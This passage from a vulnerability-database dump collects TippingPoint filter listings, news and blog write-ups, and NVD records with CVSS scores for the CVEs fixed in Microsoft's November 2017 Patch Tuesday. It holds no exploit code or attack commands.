Exploitation Unlikely \nCVE-2017-11832 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11833 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11834 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11835 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11836 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11837 | 29923 | \nCVE-2017-11838 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11839 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11840 | 29926 | \nCVE-2017-11841 | 29933 | \nCVE-2017-11842 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11843 | 29931 | \nCVE-2017-11844 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11845 | 29930 | \nCVE-2017-11846 | 29932 | \nCVE-2017-11847 | 29924 | \nCVE-2017-11848 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11849 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11850 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11851 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11852 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11853 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11854 | 29929 | \nCVE-2017-11855 | 29918 | \nCVE-2017-11856 | *29744 | \nCVE-2017-11858 | *29832 | \nCVE-2017-11861 | 29925 | \nCVE-2017-11862 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11863 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11866 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11867 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11869 | *29794 | \nCVE-2017-11870 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11871 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11872 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11873 | 29927 | \nCVE-2017-11874 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11876 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11877 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11878 | *29784 | \nCVE-2017-11879 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11880 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11882 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11883 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-8700 | | Vendor Deemed Reproducibility or Exploitation Unlikely \n \n \n\n**Zero-Day Filters**\n\nThere are 6 new zero-day filters covering one vendor in this week\u2019s Digital Vaccine (DV) package. A number of existing filters in this week\u2019s DV package were modified to update the filter description, update specific filter deployment recommendation, increase filter accuracy and/or optimize performance. You can browse the list of [published advisories](<http://www.zerodayinitiative.com/advisories/published/>) and [upcoming advisories](<http://www.zerodayinitiative.com/advisories/upcoming/>) on the [Zero Day Initiative](<http://www.zerodayinitiative.com/>) website. You can also follow the Zero Day Initiative on Twitter [@thezdi](<https://twitter.com/thezdi>) and on their [blog](<https://www.zerodayinitiative.com/blog>).\n\n**_Adobe (6)_**\n\n| \n\n * 29934: ZDI-CAN-5140: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 29935: ZDI-CAN-5141: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 29936: ZDI-CAN-5142: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 29937: ZDI-CAN-5143: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 29938: ZDI-CAN-5144: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 29939: ZDI-CAN-5145: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC) \n---|--- \n| \n \n**Missed Last Week\u2019s News?**\n\nCatch up on last week\u2019s news in my [weekly recap](<http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-november-6-2017/>).", "modified": "2017-11-17T16:46:19", "published": "2017-11-17T16:46:19", "href": "https://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-november-13-2017/", "id": "TRENDMICROBLOG:3D0DF0AC0B5B6A3B4D80A495AF488F03", "type": "trendmicroblog", "title": "TippingPoint Threat Intelligence and Zero-Day Coverage \u2013 Week of November 13, 2017", "cvss": {"score": 0.0, "vector": "NONE"}}], "qualysblog": [{"lastseen": "2019-01-23T20:50:13", "bulletinFamily": "blog", "cvelist": ["CVE-2017-11827", "CVE-2017-11830", "CVE-2017-11836", "CVE-2017-11837", "CVE-2017-11838", "CVE-2017-11839", "CVE-2017-11847", "CVE-2017-11848", "CVE-2017-11871", "CVE-2017-11873", "CVE-2017-11882", "CVE-2017-11883", "CVE-2017-13080", "CVE-2017-8700"], "description": "This November Patch Tuesday is moderate in volume and severity. Microsoft released patches to address 53 unique vulnerabilities, with 25 focused on Remote Code Execution fixes. Windows OS receives 14 patches, while the lion's share is focused on Browsers, Microsoft Office, and Adobe. According to Microsoft, there do not appear to be any actively attacked vulnerabilities in the wild in this patch release.\n\nInterestingly enough, none of the Windows OS patches are listed as Critical this month, but we do recommend focusing on [CVE-2017-11830](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11830>) and [CVE-2017-11847](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11847>), as they address a Security Feature Bypass, and a Privilege Elevation respectively. \n\nIt should also be noted that [CVE-2017-11848](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11848>), [CVE-2017-11827](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11827>), [CVE-2017-11883](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11883>), [CVE-2017-8700](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8700>) have public exploits, but they do not appear to be used in any active campaigns.\n\nFrom a prioritization standpoint, focus on the fixes for [CVE-2017-11836](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11836>), [CVE-2017-11837](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11837>), [CVE-2017-11838](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11838>), [CVE-2017-11839](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11839>), [CVE-2017-11871](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11871>), and [CVE-2017-11873](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11873>), which all address the Scripting Engine in Edge and Internet Explorer, especially on laptops, and other workstation-type systems where the logged in user may have administrative privileges. Microsoft lists exploitation as More Likely for these vulnerabilities, especially if a user is tricked into viewing a malicious site or opening an attachment.\n\nWhile Microsoft lists the fix for [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>) as Important, there may be POC code for this vulnerability, so it is recommended that you give the Office updates attention this month as well.\n\nIt should also be noted that [last Patch Tuesday](<https://blog.qualys.com/laws-of-vulnerabilities/2017/10/10/october-patch-tuesday-28-critical-microsoft-vulnerabilities>), Microsoft quietly released the fix for [CVE-2017-13080](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-13080>), widely known as the KRACK vulnerability in WPA2 wireless protocol, but did not make it known until a week later, when the vulnerability was publicly disclosed. Therefore, it is recommended you ensure last month\u2019s security patches are fully addressed. Alternatively, you can install this month\u2019s Monthly Rollups, as they should include this fix.\n\nAdobe has also [released patches for 9 advisories](<https://helpx.adobe.com/security.html>), fixing a stunning 62 CVEs for Acrobat and Reader alone, so ensure that you are updating Adobe across your environment to stay protected.", "modified": "2017-11-14T19:37:26", "published": "2017-11-14T19:37:26", "id": "QUALYSBLOG:97274435F9F49556ED060635FD9081E2", "href": "https://blog.qualys.com/laws-of-vulnerabilities/2017/11/14/november-patch-tuesday-53-vulnerabilities-and-a-massive-adobe-update", "type": "qualysblog", "title": "November Patch Tuesday: 53 Vulnerabilities and a Massive Adobe Update", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "thn": [{"lastseen": "2018-01-27T09:17:27", "bulletinFamily": "info", "cvelist": ["CVE-2017-11839", "CVE-2017-13080", "CVE-2017-11882", "CVE-2017-11871", "CVE-2017-11848", "CVE-2017-8700", "CVE-2017-11836", "CVE-2017-11830", "CVE-2017-11873", "CVE-2017-11837", "CVE-2017-11838", "CVE-2017-11877", "CVE-2017-11827", "CVE-2017-11847", "CVE-2017-11883"], "description": "[](<https://1.bp.blogspot.com/-bw77Fu5JHFk/WgvsCj_FSNI/AAAAAAAAuvQ/ndA-2CYcAZEXy-7GyBeD6Snp-urYFhaPwCLcBGAs/s1600/microsoft-security-patch-updates.png>)\n\nIt's Patch Tuesday\u2014time to update your Windows devices. \n \nMicrosoft has [released](<https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/bae9d0d8-e497-e711-80e5-000d3a32fc99>) a large batch of security updates as part of its November Patch Tuesday in order to fix a total of 53 new security vulnerabilities in various Windows products, 19 of which rated as critical, 31 important and 3 moderate. \n \nThe vulnerabilities impact the Windows OS, Microsoft Office, Microsoft Edge, Internet Explorer, Microsoft Scripting Engine, .NET Core, and more. \n \nAt least four of these vulnerabilities that the tech giant has now fixed have public exploits, allowing attackers to exploit them easily. But fortunately, none of the four are being used in the wild, according to Gill Langston at security firm [Qualys](<https://blog.qualys.com/laws-of-vulnerabilities/2017/11/14/november-patch-tuesday-53-vulnerabilities-and-a-massive-adobe-update>). \n \nThe four vulnerabilities with public exploits identified by Microsoft as CVE-2017-8700 (an information disclosure flaw in ASP.NET Core), CVE-2017-11827 (Microsoft browsers remote code execution), CVE-2017-11848 (Internet Explorer information disclosure) and CVE-2017-11883 (denial of service affecting ASP.NET Core). \n \n\n\n### Potentially Exploitable Security Vulnerabilities\n\n \nWhat's interesting about this month's patch Tuesday is that none of the Windows OS patches are rated as Critical. However, Device Guard Security Feature Bypass Vulnerability (CVE-2017-11830) and Privilege Elevation flaw (CVE-2017-11847) are something you should focus on. \n \nAlso, according to an [analysis](<https://www.zerodayinitiative.com/blog/2017/11/14/the-november-2017-security-update-review>) of Patch Tuesday fixes by Zero-Day Initiative, [CVE-2017-11830](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11830>) and another flaw identified as [CVE-2017-11877](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11877>) can be exploited to spread malware. \n\n\n> \"CVE-2017-11830 patches a Device Guard security feature bypass vulnerability that would allow malware authors to falsely authenticated files,\" Zero-Day Initiative said. \n \n\"CVE-2017-11877 fixes an Excel security feature bypass vulnerability that fails to enforce macro settings, which are often used by malware developers.\"\n\nThe tech giant also fixed six remote code execution vulnerabilities exist \"in the way the scripting engine handles objects in memory in Microsoft browsers.\" \n \nMicrosoft identified these vulnerabilities as CVE-2017-11836, CVE-2017-11837, CVE-2017-11838, CVE-2017-11839, CVE-2017-11871, and CVE-2017-11873, which could corrupt memory in such a way that attackers could execute malicious code in the context of the current user. \n\n\n> \"In a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft Edge and then convince a user to view the website,\" Microsoft said. \"These websites could contain specially crafted content that could exploit the vulnerability.\" \n\n> ### 17-Year-Old MS Office Flaw Lets Hackers Install Malware\n\n \nAlso, you should be extra careful when opening files in MS Office. \n \nAll versions of Microsoft Office released in the past 17 years found vulnerable to [remote code execution flaw](<https://thehackernews.com/2017/11/microsoft-office-rce-exploit.html>) (CVE-2017-11882) that works against all versions of Windows operating system, including the latest Microsoft Windows 10 Creators Update. \n \nHowever, due to improper memory operations, the component fails to properly handle objects in the memory, corrupting it in such a way that the attacker could execute malicious code in the context of the logged-in user. \n \nExploitation of this vulnerability requires opening a specially crafted malicious file with an affected version of Microsoft Office or Microsoft WordPad software, which could allow attackers to remotely install malware on targeted computers. \n \n\n\n### Adobe Patch Tuesday: Patches 62 Vulnerabilities\n\n \nBesides fixing vulnerabilities in its various products, Microsoft has also released updates for Adobe Flash Player. \n \nThese updates correspond with [Adobe Update APSB17-33](<https://helpx.adobe.com/security/products/flash-player/apsb17-33.html>), which patches 62 CVEs for Acrobat and Reader alone. So, Flash Player users are advised to ensure that they update Adobe across their environment to stay protected. \n \nIt should also be noted that last Patch Tuesday, Microsoft quietly released the patch for the dangerous **[KRACK vulnerability](<https://thehackernews.com/2017/10/wpa2-krack-wifi-hacking.html>)** (CVE-2017-13080) in the WPA2 wireless protocol. \n \nTherefore, users are also recommended to make sure that they have patched their systems with the last month's security patches. \n \nAlternatively, users are strongly advised to apply November security patches as soon as possible in order to keep hackers and cybercriminals away from taking control of their computers. \n \nFor installing security updates, just head on to Settings \u2192 Update &amp; security \u2192 Windows Update \u2192 Check for updates, or you can install the updates manually.\n", "modified": "2017-11-15T10:15:50", "published": "2017-11-14T20:46:00", "id": "THN:96CCD36932DBF3F5BEFCC18D4EC4E5C2", "href": "https://thehackernews.com/2017/11/microsoft-patch-tuesday.html", "type": "thn", "title": "Patch Tuesday: Microsoft Releases Update to Fix 53 Vulnerabilities", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "threatpost": [{"lastseen": "2019-01-23T05:28:08", "bulletinFamily": "info", "cvelist": ["CVE-2017-11770", "CVE-2017-11827", "CVE-2017-11830", "CVE-2017-11836", "CVE-2017-11837", "CVE-2017-11838", "CVE-2017-11839", "CVE-2017-11848", "CVE-2017-11871", "CVE-2017-11873", "CVE-2017-11877", "CVE-2017-11879", "CVE-2017-11882", "CVE-2017-11883", "CVE-2017-8700"], "description": "Microsoft tackled 53 vulnerabilities with today\u2019s Patch Tuesday bulletin. Remote code execution bugs dominated this month\u2019s patches, representing 25 fixes. In total, 20 of Microsoft\u2019s security fixes were rated critical.\n\nNotable are four vulnerabilities with public exploits identified by Microsoft as [CVE-2017-11848](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11848>), [CVE-2017-11827](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11827>), [CVE-2017-11883](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11883>) and [CVE-2017-8700](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8700>). But, according to an analysis of Patch Tuesday fixes by Qualys, none of the four are being [used in active campaigns](<https://blog.qualys.com/laws-of-vulnerabilities/2017/11/14/november-patch-tuesday-53-vulnerabilities-and-a-massive-adobe-update>).\n\nSecurity experts say companies should prioritize patching a half-dozen scripting engine memory corruption vulnerabilities impacting Microsoft\u2019s Edge and Internet Explorer 11 browsers running on versions of Windows 10, Windows 8.1 , Windows 7 and Windows Server (version 1709).\n\n\u201cA remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user,\u201d wrote Microsoft regarding [CVE-2017-11836](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11836>), [CVE-2017-11837](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11837>), [CVE-2017-11838](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11838>), [CVE-2017-11839](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11839>), [CVE-2017-11871](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11871>), and [CVE-2017-11873](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11873>).\n\nMicrosoft said if exploited, an attacker could gain the same user rights as the current user. \u201cIn a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft Edge and then convince a user to view the website,\u201d Microsoft wrote. \u201cThese websites could contain specially crafted content that could exploit the vulnerability.\u201d\n\nResearchers at Zero Day Initiative said that of the critical vulnerabilities it spotted, a distinct malware[ bypass theme emerged](<https://www.thezdi.com/blog/2017/11/14/the-november-2017-security-update-review>). It wrote, \u201c[CVE-2017-11830](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11830>) patches a Device Guard security feature bypass vulnerability that would allow malware authors to falsely authenticated files\u2026 [CVE-2017-11877](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11877>) fixes an Excel security feature bypass vulnerability that fails to enforce macro settings, which are often used by malware developers.\u201d\n\n\u201cSpeaking of malware, this patch fixes a CVE ([CVE-2017-11830](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11830>)) that allows Device Guard to incorrectly validates an untrusted file. This means attackers could make an unsigned file appear to be signed. Since Device Guard relies on a valid signature to determine trustworthiness, malicious files could be executed by making untrusted files seem trusted. This is exactly the sort of bug malware authors seek, as it allows them to have their exploit appear as a trusted file to the target,\u201d ZDI wrote.\n\nPart of Patch Tuesday also included an advisory ([ADV170020](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV170020>)), which is related to Microsoft Office Defense in Depth Update series. \u201cADV170020 is likely related to the malware abusing Dynamic Data Exchange, and this advisory may help restrict abusing this protocol feature,\u201d wrote Zero Day Initiative researchers.\n\nDespite a number of [attacks that have used Dynamic Data Exchange fields in Office](<https://threatpost.com/microsoft-provides-guidance-on-mitigating-dde-attacks/128833/>), Microsoft has remained insistent that DDE is a product feature and not a vulnerability.\n\nPart of Patch Tuesday also includes something new, according to Greg Wiseman, Rapid7\u2019s senior security researcher, who said Microsoft is applying fixes to some of its open source projects. \u201cSixteen of the Edge vulnerabilities have been resolved in ChakraCore, the open source part of Edge\u2019s JavaScript engine,\u201d Wiseman said. \u201c.NET Core is being patched for a denial of service (DoS) vulnerability ([CVE-2017-11770](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11770>)), and ASP.NET Core has fixes for DoS ([CVE-2017-11883](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11883>)), privilege escalation ([CVE-2017-11879](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11879>)), and information disclosure ([CVE-2017-8700](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8700>)) vulnerabilities this month.\u201d\n\nLastly, Qualys warns ([CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>)), a Microsoft Office memory corruption vulnerability rated as important, should be prioritized. \u201cThere may be POC code for this vulnerability, so it is recommended that you give the Office updates attention this month as well,\u201d Qualys wrote.\n", "modified": "2017-11-14T17:10:48", "published": "2017-11-14T17:10:48", "id": "THREATPOST:BF3CD27D3018BF7BD8E93D42325DAA73", "href": "https://threatpost.com/microsoft-patches-20-critical-vulnerabilities/128891/", "type": "threatpost", "title": "Microsoft November Patch Tuesday Fixes 20 Critical Vulnerabilities", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2021-02-02T06:36:34", "description": "ChakraCore and Microsoft Edge in Windows 10 1709 and Windows Server, version 1709 allows an attacker to gain the same user rights as the current user, due to how the scripting engine handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2017-11836, CVE-2017-11837, CVE-2017-11838, CVE-2017-11839, CVE-2017-11840, CVE-2017-11841, CVE-2017-11843, CVE-2017-11846, CVE-2017-11858, CVE-2017-11859, CVE-2017-11861, CVE-2017-11866, CVE-2017-11869, CVE-2017-11870, CVE-2017-11871, and CVE-2017-11873.", "edition": 4, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-11-15T03:29:00", "title": "CVE-2017-11862", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11862"], "modified": "2017-11-30T13:21:00", "cpe": ["cpe:/a:microsoft:chakracore:-", "cpe:/a:microsoft:edge:-"], "id": "CVE-2017-11862", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11862", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:chakracore:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:edge:-:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:34", "description": "Microsoft Edge in Microsoft Windows 10 1703, 1709 and Windows Server, version 1709 allows an attacker to obtain information to further compromise the user's system, due to how Microsoft Edge handles objects in memory, aka \"Microsoft Edge Information Disclosure Vulnerability\". This CVE ID is unique from CVE-2017-11803 and CVE-2017-11833.", "edition": 4, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 1.4}, "published": "2017-11-15T03:29:00", "title": "CVE-2017-11844", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11844"], "modified": "2017-12-01T15:26:00", "cpe": ["cpe:/a:microsoft:edge:*"], "id": "CVE-2017-11844", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11844", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:microsoft:edge:*:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:34", "description": "Microsoft Edge in Microsoft Windows 10 1703, 1709, Windows Server, version 1709, and ChakraCore allows an attacker to bypass Control Flow Guard (CFG) to run arbitrary code on a target system, due to how Microsoft Edge handles accessing memory in code compiled by the Edge Just-In-Time (JIT) compiler, aka \"Microsoft Edge Security Feature Bypass Vulnerability\". This CVE ID is unique from CVE-2017-11863 and CVE-2017-11872.", "edition": 5, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 3.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 1.4}, "published": "2017-11-15T03:29:00", "title": "CVE-2017-11874", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11874"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/a:microsoft:chakracore:-", "cpe:/a:microsoft:edge:-"], "id": "CVE-2017-11874", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11874", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:microsoft:chakracore:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:edge:-:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:34", "description": "Microsoft Edge in Windows 10 1607, 1703, 1709, Windows Server 2016 and Windows Server, version 1709 allows an attacker to gain the same user rights as the current user, due to how the scripting engine handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2017-11836, CVE-2017-11837, CVE-2017-11838, CVE-2017-11839, CVE-2017-11840, CVE-2017-11841, CVE-2017-11843, CVE-2017-11846, CVE-2017-11858, CVE-2017-11859, CVE-2017-11862, CVE-2017-11866, CVE-2017-11869, CVE-2017-11870, CVE-2017-11871, and CVE-2017-11873.", "edition": 4, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-11-15T03:29:00", "title": "CVE-2017-11861", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11861"], "modified": "2017-11-30T12:51:00", "cpe": ["cpe:/a:microsoft:chakracore:-", "cpe:/a:microsoft:edge:-"], "id": "CVE-2017-11861", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11861", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:chakracore:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:edge:-:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:34", "description": "The Windows kernel component on Windows 7 SP1, Windows Server 2008 SP2 and R2 SP1, Windows 8.1 and RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, and 1709, Windows Server 2016, and Windows Server, version 1709, allows an information disclosure vulnerability when it improperly handles objects in memory, aka \"Windows Kernel Information Disclosure Vulnerability\". This CVE ID is unique from CVE-2017-11842, CVE-2017-11849, and CVE-2017-11853.", "edition": 4, "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.7, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-11-15T03:29:00", "title": "CVE-2017-11851", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11851"], "modified": "2017-12-01T18:29:00", "cpe": ["cpe:/o:microsoft:windows_server:1709", 